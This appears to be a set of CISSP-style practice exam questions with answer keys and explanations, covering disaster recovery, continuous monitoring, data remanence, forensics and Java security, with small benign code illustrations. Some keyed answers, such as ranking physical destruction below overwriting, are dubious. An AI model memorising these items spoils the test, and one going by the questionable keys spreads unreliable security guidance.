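downtime = hours_per_year * (1 - availability)
print(round(downtime, 2), "hours/year")       # 0.44 hours, about 26 minutes
```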
However, a Tier 4 data center cannot prevent or mitigate application failures, which are caused by software bugs, configuration errors, or malicious attacks. Application failures can affect the functionality, performance, or security of the IT services, and cause data loss, corruption, or breach. Therefore, the IT manager should be most concerned with application failures when preparing a BCP, and ensure that the applications are properly designed, tested, updated, and monitored.
Which of the following types of technologies would be the MOST cost-effective method to provide a reactive control for protecting personnel in public areas?
Install mantraps at the building entrances
Enclose the personnel entry area with polycarbonate plastic
Supply a duress alarm for personnel exposed to the public
Hire a guard to protect the public area
Supplying a duress alarm for personnel exposed to the public is the most cost-effective method to provide a reactive control for protecting personnel in public areas. A duress alarm is a device that allows a person to signal for help in case of an emergency, such as an attack, a robbery, or a medical condition. A duress alarm can be activated by pressing a button, pulling a cord, or speaking a code word. A duress alarm can alert security personnel, law enforcement, or other responders to the location and nature of the emergency, and initiate appropriate actions. A duress alarm is a reactive control because it responds to an incident after it has occurred, rather than preventing it from happening.
The other options are not as cost-effective as supplying a duress alarm, as they involve more expensive or complex technologies or resources. Installing mantraps at the building entrances is a preventive control that restricts the access of unauthorized persons to the facility, but it also requires more space, maintenance, and supervision. Enclosing the personnel entry area with polycarbonate plastic is a preventive control that protects the personnel from physical attacks, but it also reduces the visibility and ventilation of the area. Hiring a guard to protect the public area is a deterrent control that discourages potential attackers, but it also involves paying wages, benefits, and training costs.
An important principle of defense in depth is that achieving information security requires a balanced focus on which PRIMARY elements?
Development, testing, and deployment
Prevention, detection, and remediation
People, technology, and operations
Certification, accreditation, and monitoring
An important principle of defense in depth is that achieving information security requires a balanced focus on the primary elements of people, technology, and operations. People are the users, administrators, managers, and other stakeholders who are involved in the security process. They need to be aware, trained, motivated, and accountable for their security roles and responsibilities. Technology is the hardware, software, network, and other tools that are used to implement the security controls and measures. They need to be selected, configured, updated, and monitored according to the security standards and best practices. Operations are the policies, procedures, processes, and activities that are performed to achieve the security objectives and requirements. They need to be documented, reviewed, audited, and improved continuously to ensure their effectiveness and efficiency.
The other options are not the primary elements of defense in depth, but rather the phases, functions, or outcomes of the security process. Development, testing, and deployment are the phases of the security life cycle, which describes how security is integrated into the system development process. Prevention, detection, and remediation are the functions of the security management, which describes how security is maintained and improved over time. Certification, accreditation, and monitoring are the outcomes of the security evaluation, which describes how security is assessed and verified against the criteria and standards.
What is the MOST important consideration from a data security perspective when an organization plans to relocate?
Ensure the fire prevention and detection systems are sufficient to protect personnel
Review the architectural plans to determine how many emergency exits are present
Conduct a gap analysis of the new facilities against existing security requirements
Revise the Disaster Recovery and Business Continuity (DR/BC) plan
When an organization plans to relocate, the most important consideration from a data security perspective is to conduct a gap analysis of the new facilities against the existing security requirements. A gap analysis is a process that identifies and evaluates the differences between the current state and the desired state of a system or a process. In this case, the gap analysis would compare the security controls and measures implemented in the old and new locations, and identify any gaps or weaknesses that need to be addressed. The gap analysis would also help to determine the costs and resources needed to implement the necessary security improvements in the new facilities.
The other options are not as important as conducting a gap analysis, as they do not directly address the data security risks associated with relocation. Ensuring the fire prevention and detection systems are sufficient to protect personnel is a safety issue, not a data security issue. Reviewing the architectural plans to determine how many emergency exits are present is also a safety issue, not a data security issue. Revising the Disaster Recovery and Business Continuity (DR/BC) plan is a good practice, but it is not a preventive measure, rather a reactive one. A DR/BC plan is a document that outlines how an organization will recover from a disaster and resume its normal operations. A DR/BC plan should be updated regularly, not only when relocating.
Which of the following represents the GREATEST risk to data confidentiality?
Network redundancies are not implemented
Security awareness training is not completed
Backup tapes are generated unencrypted
Users have administrative privileges
Generating backup tapes unencrypted represents the greatest risk to data confidentiality, as it exposes the data to unauthorized access or disclosure if the tapes are lost, stolen, or intercepted. Backup tapes are often stored off-site or transported to remote locations, which increases the chances of them falling into the wrong hands. If the backup tapes are unencrypted, anyone who obtains them can read the data without any difficulty. Therefore, backup tapes should always be encrypted using strong algorithms and keys, and the keys should be protected and managed separately from the tapes.
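As a simple illustration, the following Python sketch encrypts a backup payload with Fernet (an authenticated symmetric scheme from the cryptography package) before it would be written to tape; the comments emphasize the key-management discipline described above.

```python
from cryptography.fernet import Fernet

# The key is generated once and kept in a key management system,
# stored and transported separately from the tapes themselves.
key = Fernet.generate_key()
f = Fernet(key)

backup_data = b"customer records, payroll, trade secrets..."
token = f.encrypt(backup_data)        # this ciphertext is what goes to tape

# A lost or stolen tape is unreadable without the key; with it, restore works:
assert f.decrypt(token) == backup_data
```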
The other options do not pose as much risk to data confidentiality as generating unencrypted backup tapes. Failing to implement network redundancies affects the availability and reliability of the network, but not necessarily the confidentiality of the data. Incomplete security awareness training increases the likelihood of human errors or negligence that could compromise the data, but not as directly as unencrypted backups. Granting users administrative privileges gives them more access and control over systems and data, but the exposure is not as broad as that of an unencrypted tape leaving the organization’s control.
When assessing an organization’s security policy according to standards established by the International Organization for Standardization (ISO) 27001 and 27002, when can management responsibilities be defined?
Only when assets are clearly defined
Only when standards are defined
Only when controls are put in place
Only when procedures are defined
When assessing an organization’s security policy according to standards established by the ISO 27001 and 27002, management responsibilities can be defined only when standards are defined. Standards are the specific rules, guidelines, or procedures that support the implementation of the security policy. Standards define the minimum level of security that must be achieved by the organization, and provide the basis for measuring compliance and performance. Standards also assign roles and responsibilities to different levels of management and staff, and specify the reporting and escalation procedures.
Management responsibilities are the duties and obligations that managers have to ensure the effective and efficient execution of the security policy and standards. Management responsibilities include providing leadership, direction, support, and resources for the security program, establishing and communicating the security objectives and expectations, ensuring compliance with the legal and regulatory requirements, monitoring and reviewing the security performance and incidents, and initiating corrective and preventive actions when needed.
Management responsibilities cannot be defined without standards, as standards provide the framework and criteria for defining what managers need to do and how they need to do it. Management responsibilities also depend on the scope and complexity of the security policy and standards, which may vary depending on the size, nature, and context of the organization. Therefore, standards must be defined before management responsibilities can be defined.
The other options are not correct, as they are not prerequisites for defining management responsibilities. Assets are the resources that need to be protected by the security policy and standards, but they do not determine the management responsibilities. Controls are the measures that are implemented to reduce the security risks and achieve the security objectives, but they do not determine the management responsibilities. Procedures are the detailed instructions that describe how to perform the security tasks and activities, but they do not determine the management responsibilities.
Which of the following actions will reduce risk to a laptop before traveling to a high risk area?
Examine the device for physical tampering
Implement more stringent baseline configurations
Purge or re-image the hard disk drive
Change access codes
Purging or re-imaging the hard disk drive of a laptop before traveling to a high risk area will reduce the risk of data compromise or theft in case the laptop is lost, stolen, or seized by unauthorized parties. Purging or re-imaging the hard disk drive will erase all the data and applications on the laptop, leaving only the operating system and the essential software. This will minimize the exposure of sensitive or confidential information that could be accessed by malicious actors. Purging or re-imaging the hard disk drive should be done using secure methods that prevent data recovery, such as overwriting, degaussing, or physical destruction.
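A simplified sketch of the overwrite idea in Python appears below. It is illustrative only: on solid-state drives and journaling or copy-on-write filesystems, old blocks can survive wear-leveling and snapshots, so real purging relies on full-disk re-imaging, drive sanitize commands, or physical destruction.

```python
import os

def overwrite_and_delete(path: str, passes: int = 3) -> None:
    """Overwrite a file's contents with random bytes before unlinking it.
    NOTE: not a guaranteed purge on SSDs or snapshotting filesystems."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            remaining = size
            while remaining > 0:
                block = min(remaining, 1024 * 1024)
                f.write(os.urandom(block))     # random data, one chunk at a time
                remaining -= block
            f.flush()
            os.fsync(f.fileno())               # push the overwrite to the device
    os.remove(path)

# overwrite_and_delete("/home/traveler/confidential.docx")
```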
The other options will not reduce the risk to the laptop as effectively as purging or re-imaging the hard disk drive. Examining the device for physical tampering will only detect if the laptop has been compromised after the fact, but will not prevent it from happening. Implementing more stringent baseline configurations will improve the security settings and policies of the laptop, but will not protect the data if the laptop is bypassed or breached. Changing access codes will make it harder for unauthorized users to log in to the laptop, but will not prevent them from accessing the data if they use other methods, such as booting from a removable media or removing the hard disk drive.
When in the Software Development Life Cycle (SDLC) MUST software security functional requirements be defined?
After the system preliminary design has been developed and the data security categorization has been performed
After the vulnerability analysis has been performed and before the system detailed design begins
After the system preliminary design has been developed and before the data security categorization begins
After the business functional analysis and the data security categorization have been performed
Software security functional requirements must be defined after the business functional analysis and the data security categorization have been performed in the Software Development Life Cycle (SDLC). The SDLC is a process that involves planning, designing, developing, testing, deploying, operating, and maintaining a system, using various models and methodologies, such as waterfall, spiral, agile, or DevSecOps. The SDLC can be divided into several phases, each with its own objectives and activities, such as initiation, development and acquisition, implementation and assessment, operations and maintenance, and disposal.
Software security functional requirements are the specific and measurable security features and capabilities that the system must provide to meet the security objectives and requirements. Software security functional requirements are derived from the business functional analysis and the data security categorization, which are two tasks that are performed in the system initiation phase of the SDLC. The business functional analysis is the process of identifying and documenting the business functions and processes that the system must support and enable, such as the inputs, outputs, workflows, and tasks. The data security categorization is the process of determining the security level and impact of the system and its data, based on the confidentiality, integrity, and availability criteria, and applying the appropriate security controls and measures. Software security functional requirements must be defined after the business functional analysis and the data security categorization have been performed, because they can ensure that the system design and development are consistent and compliant with the security objectives and requirements, and that the system security is aligned and integrated with the business functions and processes.
The other options are not the phases of the SDLC when the software security functional requirements must be defined, but rather phases that involve other tasks or activities related to the system design and development.

After the system preliminary design has been developed and the data security categorization has been performed is not the phase when the software security functional requirements must be defined, but rather the phase when the system architecture and components are designed, based on the system scope and objectives, and the data security categorization is verified and validated.

After the vulnerability analysis has been performed and before the system detailed design begins is not the phase when the software security functional requirements must be defined, but rather the phase when the system design and components are evaluated and tested for security effectiveness and compliance, and the system detailed design is developed, based on the system architecture and components.

After the system preliminary design has been developed and before the data security categorization begins is not the phase when the software security functional requirements must be defined, but rather the phase when the system architecture and components are designed, based on the system scope and objectives, and the data security categorization is initiated and planned.
A Java program is being developed to read a file from computer A and write it to computer B, using a third computer C. The program is not working as expected. What is the MOST probable security feature of Java preventing the program from operating as intended?
Least privilege
Privilege escalation
Defense in depth
Privilege bracketing
The most probable security feature of Java preventing the program from operating as intended is least privilege. Least privilege is a principle that states that a subject (such as a user, a process, or a program) should only have the minimum amount of access or permissions that are necessary to perform its function or task. Least privilege can help to reduce the attack surface and the potential damage of a system or network, by limiting the exposure and impact of a subject in case of a compromise or misuse.
Java implements the principle of least privilege through its security model, which consists of several components, such as the class loader, the bytecode verifier, the security manager, and the access controller, which together grant each class only the permissions allowed by its source, signer, and security policy.
In this question, the Java program is being developed to read a file from computer A and write it to computer B, using a third computer C. This means that the Java program needs to have the permissions to perform the file I/O and the network communication operations, which are considered as sensitive or risky actions by the Java security model. However, if the Java program is running on computer C with the default or the minimal security permissions, such as in the Java Security Sandbox, then it will not be able to perform these operations, and the program will not work as expected. Therefore, the most probable security feature of Java preventing the program from operating as intended is least privilege, which limits the access or permissions of the Java program based on its source, signer, or policy.
The other options are not the security features of Java preventing the program from operating as intended, but rather concepts or techniques that are related to security in general or in other contexts. Privilege escalation is a technique that allows a subject to gain higher or unauthorized access or permissions than what it is supposed to have, by exploiting a vulnerability or a flaw in a system or network. Privilege escalation can help an attacker to perform malicious actions or to access sensitive resources or data, by bypassing the security controls or restrictions. Defense in depth is a concept that states that a system or network should have multiple layers or levels of security, to provide redundancy and resilience in case of a breach or an attack. Defense in depth can help to protect a system or network from various threats and risks, by using different types of security measures and controls, such as the physical, the technical, or the administrative ones. Privilege bracketing is a technique that allows a subject to temporarily elevate or lower its access or permissions, to perform a specific function or task, and then return to its original or normal level. Privilege bracketing can help to reduce the exposure and impact of a subject, by minimizing the time and scope of its higher or lower access or permissions.
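As an aside, privilege bracketing has a direct counterpart in the same Java security APIs discussed above. The sketch below confines privileged work to the smallest possible block via AccessController.doPrivileged (part of the same deprecated-but-standard API family); the property name is illustrative:

```java
// Hypothetical sketch of privilege bracketing in Java: only the code
// inside doPrivileged runs with this class's own (higher) privileges;
// code before and after it stays at the ambient privilege level.
import java.security.AccessController;
import java.security.PrivilegedAction;

public class PrivilegeBracketingDemo {
    static String readConfig() {
        return AccessController.doPrivileged(
                (PrivilegedAction<String>) () -> System.getProperty("app.config.path"));
    }

    public static void main(String[] args) {
        System.out.println("Config path: " + readConfig());
    }
}
```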
What operations role is responsible for protecting the enterprise from corrupt or contaminated media?
Information security practitioner
Information librarian
Computer operator
Network administrator
According to the CISSP CBK Official Study Guide, an information librarian is responsible for managing, maintaining, and protecting the organization’s knowledge resources, including ensuring that media (such as hard drives, USB drives, and CDs) are free from corruption or contamination, thereby protecting the integrity of the enterprise’s data. An information librarian also catalogs, indexes, and classifies the media; provides access and retrieval services to authorized users; and may perform backup, recovery, and disposal of the media, as well as monitor and audit its usage and security. An information security practitioner is not the operations role responsible for protecting the enterprise from corrupt or contaminated media, although they may be involved in defining and enforcing the policies and standards for media security. An information security practitioner is a general term for a person who performs various information security functions for the organization, such as planning, designing, implementing, testing, operating, or auditing security systems and controls, and who may provide guidance, advice, and training to other roles and stakeholders. A computer operator is not the responsible role either, although they may use and handle the media. A computer operator operates and controls the organization’s computer systems and devices, such as servers, workstations, printers, and scanners, and performs tasks such as loading and unloading media, running and monitoring programs and applications, troubleshooting and resolving errors, and reporting and documenting activities and incidents. A network administrator is likewise not the responsible role, although they may configure and connect the media. A network administrator administers and manages the organization’s network systems and devices, such as routers, switches, firewalls, and wireless access points, and performs tasks such as installing and updating network software and hardware, maintaining network parameters and security, optimizing and troubleshooting network performance and availability, and supporting network users and clients. References: CISSP CBK Official Study Guide.
Which of the following is the MOST important consideration when developing a Disaster Recovery Plan (DRP)?
The dynamic reconfiguration of systems
The cost of downtime
A recovery strategy for all business processes
A containment strategy
According to the CISSP All-in-One Exam Guide, the most important consideration when developing a Disaster Recovery Plan (DRP) is to have a recovery strategy for all business processes. A DRP is a document that defines the procedures and actions to be taken in the event of a disaster that disrupts the normal operations of an organization. A recovery strategy specifies how the organization will restore its critical business processes and functions, along with the supporting resources, such as data, systems, personnel, and facilities, within the predefined recovery objectives and time frames. A recovery strategy should cover all business processes, not just the IT-related ones, as they may have interdependencies and impacts on each other, and it should be aligned with the business continuity plan (BCP), which defines the procedures and actions to be taken to ensure the continuity of essential business operations during and after a disaster. The dynamic reconfiguration of systems is not the most important consideration, although it is a useful technique for enhancing the resilience and availability of systems. It is the ability to change the configuration and functionality of systems without interrupting their operations, such as adding, removing, or replacing components, modules, or services; it may reduce downtime and recovery time, but it does not address the recovery of business processes and functions. The cost of downtime is not the most important consideration, although it influences the recovery objectives and priorities. It is the amount of money the organization loses or spends due to the disruption of its normal operations, such as lost revenue, productivity, reputation, or customers, plus the expenses for recovery, restoration, or compensation; it may justify the investment and budget for the DRP, but it does not address the recovery of business processes and functions. A containment strategy is not the most important consideration, although it may be part of the incident response plan (IRP), which defines the procedures and actions to detect, analyze, contain, eradicate, and recover from a security incident. A containment strategy specifies how the organization will isolate and control an incident, such as disconnecting affected systems, blocking malicious traffic, or changing passwords; it may prevent or limit the damage and spread of an incident, but it does not address the recovery of business processes and functions. References: CISSP All-in-One Exam Guide.
Place in order, from BEST (1) to WORST (4), the following methods to reduce the risk of data remanence on magnetic media.
The correct order, from best (1) to worst (4), is: 1. Degaussing, 2. Overwriting, 3. Destruction, 4. Deleting. Degaussing decreases or eliminates the remnant magnetic field on magnetic media, making it the best method among the options for reducing the risk of data remanence. Overwriting replaces old data with new data, which is also effective but not as thorough as degaussing. Destruction physically destroys the media, which is effective but not always practical or environmentally friendly. Deleting merely removes the data pointers and does not actually erase the data from the media, making it the worst option.
Which of the following is the BEST method to assess the effectiveness of an organization's vulnerability management program?
Review automated patch deployment reports
Periodic third party vulnerability assessment
Automated vulnerability scanning
Perform vulnerability scan by security team
A third-party vulnerability assessment provides an unbiased evaluation of the organization’s security posture, identifying existing vulnerabilities and offering recommendations for mitigation. It is more comprehensive and objective compared to internal reviews or automated scans. References: CISSP Official (ISC)2 Practice Tests, Chapter 5, page 137
What is the process called when impact values are assigned to the security objectives for information types?
Qualitative analysis
Quantitative analysis
Remediation
System security categorization
The process called when impact values are assigned to the security objectives for information types is system security categorization. System security categorization is a process of determining the potential impact on an organization if a system or information is compromised, based on the security objectives of confidentiality, integrity, and availability. System security categorization helps to identify the security requirements and controls for the system or information, as well as to prioritize the resources and efforts for protecting them. System security categorization can be based on the standards or guidelines provided by the organization or the relevant authorities, such as the Federal Information Processing Standards (FIPS) Publication 199 or the National Institute of Standards and Technology (NIST) Special Publication 800-60. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, p. 29; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Domain 1: Security and Risk Management, p. 31.
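As a rough illustration, FIPS 199 expresses a categorization as an impact value per security objective, and the overall system category is commonly taken as the high water mark (the maximum) across the objectives. The sketch below encodes that rule; the impact values in the example are illustrative:

```java
// Minimal sketch of FIPS 199-style security categorization: each security
// objective gets an impact value, and the overall system category is the
// "high water mark" (the maximum) across them. The enum ordering below
// encodes LOW < MODERATE < HIGH.
public class SecurityCategorization {
    enum Impact { LOW, MODERATE, HIGH }

    static Impact highWaterMark(Impact confidentiality, Impact integrity, Impact availability) {
        Impact max = confidentiality;
        if (integrity.compareTo(max) > 0) max = integrity;
        if (availability.compareTo(max) > 0) max = availability;
        return max;
    }

    public static void main(String[] args) {
        // Example: SC = {(confidentiality, MODERATE), (integrity, HIGH), (availability, LOW)}
        System.out.println("Overall category: "
                + highWaterMark(Impact.MODERATE, Impact.HIGH, Impact.LOW)); // prints HIGH
    }
}
```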
Although code using a specific program language may not be susceptible to a buffer overflow attack,
most calls to plug-in programs are susceptible.
most supporting application code is susceptible.
the graphical images used by the application could be susceptible.
the supporting virtual machine could be susceptible.
According to the CISSP CBK Official Study Guide, although code using a specific program language may not be susceptible to a buffer overflow attack, the supporting virtual machine could be susceptible. A buffer overflow attack is a type of attack that exploits a vulnerability in the memory allocation and management of a program, by sending more data than the buffer can hold, and overwriting the adjacent memory locations, such as the return address, the stack pointer, or the registers. A buffer overflow attack can result in various consequences, such as crashing the program, executing arbitrary code, or escalating privileges. A program language is a set of rules and syntax that defines how a program is written and executed, such as C, Java, Python, or Ruby. Some program languages, such as C, are more susceptible to buffer overflow attacks, as they allow direct manipulation of memory and pointers, and do not perform bounds checking on the buffers. Other program languages, such as Java, are less susceptible to buffer overflow attacks, as they use a virtual machine to execute the code, and perform automatic memory management and garbage collection. A virtual machine is a software application that emulates a physical machine, and provides an isolated and abstracted environment for running programs, such as the Java Virtual Machine (JVM) or the .NET Framework. However, the virtual machine itself could be susceptible to buffer overflow attacks, as it may be written in a program language that is vulnerable, or it may have flaws or bugs in its implementation or configuration. Therefore, the code using a specific program language may not be susceptible to a buffer overflow attack, but the supporting virtual machine could be susceptible. The calls to plug-in programs, the supporting application code, and the graphical images used by the application are not necessarily related to the susceptibility of the code using a specific program language to a buffer overflow attack, as they may depend on other factors, such as the type, source, and quality of the plug-in programs, the application code, and the graphical images, as well as the security controls and mechanisms that are applied to them.
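A short sketch makes the contrast concrete. In Java, an out-of-bounds write is caught by the runtime rather than corrupting adjacent memory, which is why a buffer overflow flaw, if any, would have to live in the virtual machine itself (typically implemented in C or C++) rather than in the Java source:

```java
// Illustration of why Java source code is not directly susceptible to a
// classic buffer overflow: the JVM bounds-checks every array access and
// raises an exception instead of overwriting adjacent memory.
public class BoundsCheckDemo {
    public static void main(String[] args) {
        byte[] buffer = new byte[8];
        try {
            for (int i = 0; i <= buffer.length; i++) {
                buffer[i] = 0x41; // index 8 is out of bounds
            }
        } catch (ArrayIndexOutOfBoundsException e) {
            // The write past the buffer is rejected, not silently performed.
            System.err.println("Write past the buffer rejected: " + e.getMessage());
        }
    }
}
```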
A continuous information security-monitoring program can BEST reduce risk through which of the following?
Collecting security events and correlating them to identify anomalies
Facilitating system-wide visibility into the activities of critical user accounts
Encompassing people, process, and technology
Logging both scheduled and unscheduled system changes
A continuous information security monitoring program can best reduce risk through encompassing people, process, and technology. A continuous information security monitoring program is a process that involves maintaining the ongoing awareness of the security status, events, and activities of a system or network, by collecting, analyzing, and reporting the security data and information, using various methods and tools. A continuous information security monitoring program can provide several benefits, such as maintaining situational awareness of the organization's security posture, verifying the continued effectiveness of security controls, and supporting timely, risk-based decisions and responses.
A continuous information security monitoring program can best reduce risk through encompassing people, process, and technology, because it can ensure that the continuous information security monitoring program is holistic and comprehensive, and that it covers all the aspects and elements of the system or network security. People, process, and technology are the three pillars of a continuous information security monitoring program, and they represent the following: people are the roles, responsibilities, skills, and training of those who operate and use the monitoring program; process is the policies, procedures, and workflows that govern how monitoring is planned, performed, and acted upon; and technology is the tools, systems, and automation that collect, analyze, and report the security data and information.
The other options are not the best ways to reduce risk through a continuous information security monitoring program, but rather specific or partial ways that can contribute to the risk reduction. Collecting security events and correlating them to identify anomalies is a specific way to reduce risk through a continuous information security monitoring program, but it is not the best way, because it only focuses on one aspect of the security data and information, and it does not address the other aspects, such as the security objectives and requirements, the security controls and measures, and the security feedback and improvement. Facilitating system-wide visibility into the activities of critical user accounts is a partial way to reduce risk through a continuous information security monitoring program, but it is not the best way, because it only covers one element of the system or network security, and it does not cover the other elements, such as the security threats and vulnerabilities, the security incidents and impacts, and the security response and remediation. Logging both scheduled and unscheduled system changes is a specific way to reduce risk through a continuous information security monitoring program, but it is not the best way, because it only focuses on one type of the security events and activities, and it does not focus on the other types, such as the security alerts and notifications, the security analysis and correlation, and the security reporting and documentation.
What is the MOST important step during forensic analysis when trying to learn the purpose of an unknown application?
Disable all unnecessary services
Ensure chain of custody
Prepare another backup of the system
Isolate the system from the network
Isolating the system from the network is the most important step during forensic analysis when trying to learn the purpose of an unknown application. An unknown application is an application that is not recognized or authorized by the system or network administrator, and that may have been installed or executed without the user’s knowledge or consent. An unknown application may have various purposes, such as a malicious purpose (for example, malware, a backdoor, or data exfiltration), an unauthorized but benign purpose (for example, a utility installed by a user), or a legitimate but undocumented purpose.
Forensic analysis is a process that involves examining and investigating the system or network for any evidence or traces of the unknown application, such as its origin, nature, behavior, and impact. Forensic analysis can provide several benefits, such as revealing what the application does and how it arrived on the system, supporting incident response and remediation, and preserving evidence for possible legal or disciplinary action.
Isolating the system from the network is the most important step during forensic analysis when trying to learn the purpose of an unknown application, because it can ensure that the system is isolated and protected from any external or internal influences or interferences, and that the forensic analysis is conducted in a safe and controlled environment. Isolating the system from the network can also help to prevent any malware on the system from spreading to other systems, stop a remote attacker from interfering with the analysis or destroying evidence, and preserve the system's state for examination.
The other options are not the most important steps during forensic analysis when trying to learn the purpose of an unknown application, but rather steps that should be done after or along with isolating the system from the network. Disabling all unnecessary services is a step that should be done after isolating the system from the network, because it can ensure that the system is optimized and simplified for the forensic analysis, and that the system resources and functions are not consumed or affected by any irrelevant or redundant services. Ensuring chain of custody is a step that should be done along with isolating the system from the network, because it can ensure that the integrity and authenticity of the evidence are maintained and documented throughout the forensic process, and that the evidence can be traced and verified. Preparing another backup of the system is a step that should be done after isolating the system from the network, because it can ensure that the system data and configuration are preserved and replicated for the forensic analysis, and that the system can be restored and recovered in case of any damage or loss.
What would be the MOST cost effective solution for a Disaster Recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours?
Warm site
Hot site
Mirror site
Cold site
A warm site is the most cost effective solution for a disaster recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours. A DR site is a backup facility that can be used to restore the normal operation of the organization’s IT systems and infrastructure after a disruption or disaster. A DR site can have different levels of readiness and functionality, depending on the organization’s recovery objectives and budget. The main types of DR sites are: a mirror site, which is a fully redundant, real-time replica of the primary site; a hot site, which is fully equipped with hardware, software, and current data and can take over operations within minutes to hours; a warm site, which is partially equipped with hardware and connectivity and can be made operational within hours to about a day; and a cold site, which provides only space and basic utilities and can take days or weeks to become operational.
A warm site is the most cost effective solution for a disaster recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours, because it can provide a balance between the recovery time and the recovery cost. A warm site can enable the organization to resume its critical functions and operations within a reasonable time frame, without spending too much on the DR site maintenance and operation. A warm site can also provide some flexibility and scalability for the organization to adjust its recovery strategies and resources according to its needs and priorities.
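The trade-off can be sketched as a simple selection rule: choose the cheapest site type whose typical recovery time still meets the 24-hour requirement. The recovery-time figures below are illustrative assumptions, not authoritative values:

```java
// Hypothetical sketch of RTO-driven DR site selection: pick the cheapest
// site type whose typical recovery time still meets the RTO.
import java.time.Duration;

public class DrSiteSelector {
    enum Site { MIRROR, HOT, WARM, COLD }

    static Duration typicalRecovery(Site s) {
        switch (s) {
            case MIRROR: return Duration.ZERO;      // continuous, most expensive
            case HOT:    return Duration.ofHours(2);
            case WARM:   return Duration.ofHours(24);
            default:     return Duration.ofDays(7); // COLD, cheapest
        }
    }

    // Sites are listed from most to least expensive, so scanning from the
    // cheap end and returning the first that meets the RTO is cost-optimal.
    static Site cheapestMeeting(Duration rto) {
        Site[] byDescendingCost = { Site.MIRROR, Site.HOT, Site.WARM, Site.COLD };
        for (int i = byDescendingCost.length - 1; i >= 0; i--) {
            if (typicalRecovery(byDescendingCost[i]).compareTo(rto) <= 0) {
                return byDescendingCost[i];
            }
        }
        return Site.MIRROR;
    }

    public static void main(String[] args) {
        System.out.println(cheapestMeeting(Duration.ofHours(24))); // WARM
    }
}
```

With an RTO of 24 hours, the rule lands on the warm site, matching the reasoning above.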
The other options are not the most cost effective solutions for a disaster recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours, but rather solutions that are either too costly or too slow for the organization’s recovery objectives and budget. A hot site is a solution that is too costly for a disaster recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours, because it requires the organization to invest a lot of money on the DR site equipment, software, and services, and to pay for the ongoing operational and maintenance costs. A hot site may be more suitable for the organization’s systems that cannot be unavailable for more than a few hours or minutes, or that have very high availability and performance requirements. A mirror site is a solution that is too costly for a disaster recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours, because it requires the organization to duplicate its entire primary site, with the same hardware, software, data, and applications, and to keep them online and synchronized at all times. A mirror site may be more suitable for the organization’s systems that cannot afford any downtime or data loss, or that have very strict compliance and regulatory requirements. A cold site is a solution that is too slow for a disaster recovery (DR) site given that the organization’s systems cannot be unavailable for more than 24 hours, because it requires the organization to spend a lot of time and effort on the DR site installation, configuration, and restoration, and to rely on other sources of backup data and applications. A cold site may be more suitable for the organization’s systems that can be unavailable for more than a few days or weeks, or that have very low criticality and priority.
With what frequency should monitoring of a control occur when implementing Information Security Continuous Monitoring (ISCM) solutions?
Continuously without exception for all security controls
Before and after each change of the control
At a rate concurrent with the volatility of the security control
Only during system implementation and decommissioning
Monitoring of a control should occur at a rate concurrent with the volatility of the security control when implementing Information Security Continuous Monitoring (ISCM) solutions. ISCM is a process that involves maintaining the ongoing awareness of the security status, events, and activities of a system or network, by collecting, analyzing, and reporting the security data and information, using various methods and tools. ISCM can provide several benefits, such as ongoing visibility into the security posture, early detection of security issues, and support for risk-based decision making.
A security control is a measure or mechanism that is implemented to protect the system or network from the security threats or risks, by preventing, detecting, or correcting the security incidents or impacts. A security control can have various types, such as administrative, technical, or physical, and various attributes, such as preventive, detective, or corrective. A security control can also have different levels of volatility, which is the degree or frequency of change or variation of the security control, due to various factors, such as the security requirements, the threat landscape, or the system or network environment.
Monitoring of a control should occur at a rate concurrent with the volatility of the security control when implementing ISCM solutions, because it can ensure that the ISCM solutions can capture and reflect the current and accurate state and performance of the security control, and can identify and report any issues or risks that might affect the security control. Monitoring of a control at a rate concurrent with the volatility of the security control can also help to optimize the ISCM resources and efforts, by allocating them according to the priority and urgency of the security control.
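A hypothetical sketch of this idea: assign each control a volatility rating and derive its monitoring interval from that rating. The control names and intervals are illustrative; a real ISCM program would derive them from its risk assessments (for example, per NIST SP 800-137):

```java
// Hypothetical sketch of volatility-driven ISCM scheduling: the more
// volatile a control, the more frequently it is monitored.
import java.time.Duration;
import java.util.Map;

public class IscmScheduler {
    enum Volatility { LOW, MODERATE, HIGH }

    static Duration monitoringInterval(Volatility v) {
        switch (v) {
            case HIGH:     return Duration.ofHours(1); // e.g., firewall rules
            case MODERATE: return Duration.ofDays(1);  // e.g., patch levels
            default:       return Duration.ofDays(30); // e.g., physical locks
        }
    }

    public static void main(String[] args) {
        Map<String, Volatility> controls = Map.of(
                "firewall-ruleset", Volatility.HIGH,
                "os-patch-level", Volatility.MODERATE,
                "server-room-lock", Volatility.LOW);
        controls.forEach((name, v) ->
                System.out.println(name + " -> check every " + monitoringInterval(v)));
    }
}
```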
The other options are not the correct frequencies for monitoring of a control when implementing ISCM solutions, but rather incorrect or unrealistic frequencies that might cause problems or inefficiencies for the ISCM solutions. Continuously without exception for all security controls is an incorrect frequency for monitoring of a control when implementing ISCM solutions, because it is not feasible or necessary to monitor all security controls at the same and constant rate, regardless of their volatility or importance. Continuously monitoring all security controls without exception might cause the ISCM solutions to consume excessive or wasteful resources and efforts, and might overwhelm or overload the ISCM solutions with too much or irrelevant data and information. Before and after each change of the control is an incorrect frequency for monitoring of a control when implementing ISCM solutions, because it is not sufficient or timely to monitor the security control only when there is a change of the security control, and not during the normal operation of the security control. Monitoring the security control only before and after each change might cause the ISCM solutions to miss or ignore the security status, events, and activities that occur between the changes of the security control, and might delay or hinder the ISCM solutions from detecting and responding to the security issues or incidents that affect the security control. Only during system implementation and decommissioning is an incorrect frequency for monitoring of a control when implementing ISCM solutions, because it is not appropriate or effective to monitor the security control only during the initial or final stages of the system or network lifecycle, and not during the operational or maintenance stages of the system or network lifecycle. Monitoring the security control only during system implementation and decommissioning might cause the ISCM solutions to neglect or overlook the security status, events, and activities that occur during the regular or ongoing operation of the system or network, and might prevent or limit the ISCM solutions from improving and optimizing the security control.
Which of the following BEST describes Recovery Time Objective (RTO)?
Time of data validation after disaster
Time of data restoration from backup after disaster
Time of application resumption after disaster
Time of application verification after disaster
